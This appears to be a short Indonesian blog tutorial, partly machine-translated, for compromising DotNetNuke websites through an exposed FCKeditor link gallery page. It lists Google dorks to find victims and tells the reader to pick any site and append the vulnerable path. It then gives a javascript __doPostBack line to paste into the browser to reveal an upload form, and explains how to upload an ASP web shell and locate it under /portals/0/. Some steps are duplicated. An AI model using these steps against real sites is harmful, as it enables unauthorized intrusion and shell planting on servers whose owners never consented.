Dork: inurl :/ tabid/36/language/en-US/Default.aspx
inurl: fcklinkgallery.aspx
Exploit: / Penyedia / HtmlEditorProviders / Fck / fcklinkgallery.aspx
1 - Salin salah satu dork tersebut dan paste di Google
2 -Pilih situs manapun
3 - Paste mengeksploitasi pada akhir situs URL
Contoh:
www.site.com /Penyedia/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pemanfaatan Sasaran
1 - Copy kode di bawah ini dan paste di Anda address bar konsol / Browser.
javascript: __doPostBack ('ctlURL $ cmdUpload','')
2 - Setelah Anda memasukkan javascript, Anda akan melihat opsi browse seperti pada gambar di bawah .
1 - Copy kode di bawah ini dan paste di Anda address bar konsol / Browser.
javascript: __doPostBack ('ctlURL $ cmdUpload','')
2 - Setelah Anda memasukkan javascript, Anda akan melihat opsi browse seperti pada gambar di bawah .
3 - Untuk meng-upload shell, Anda hanya dapat meng-upload ASP filetype shell.
4 - Untuk melihat file Anda, tambahkan / portals/0/FILENAME.jpg pada akhir situs
Contoh: www.site . com / portals/0/FILENAME.jpg
Contoh: www.site . com / portals/0/FILENAME.jpg
Copas Beri Sumber : Hargailah Orang Lain Jika Ingin Dihargai
ConversionConversion EmoticonEmoticon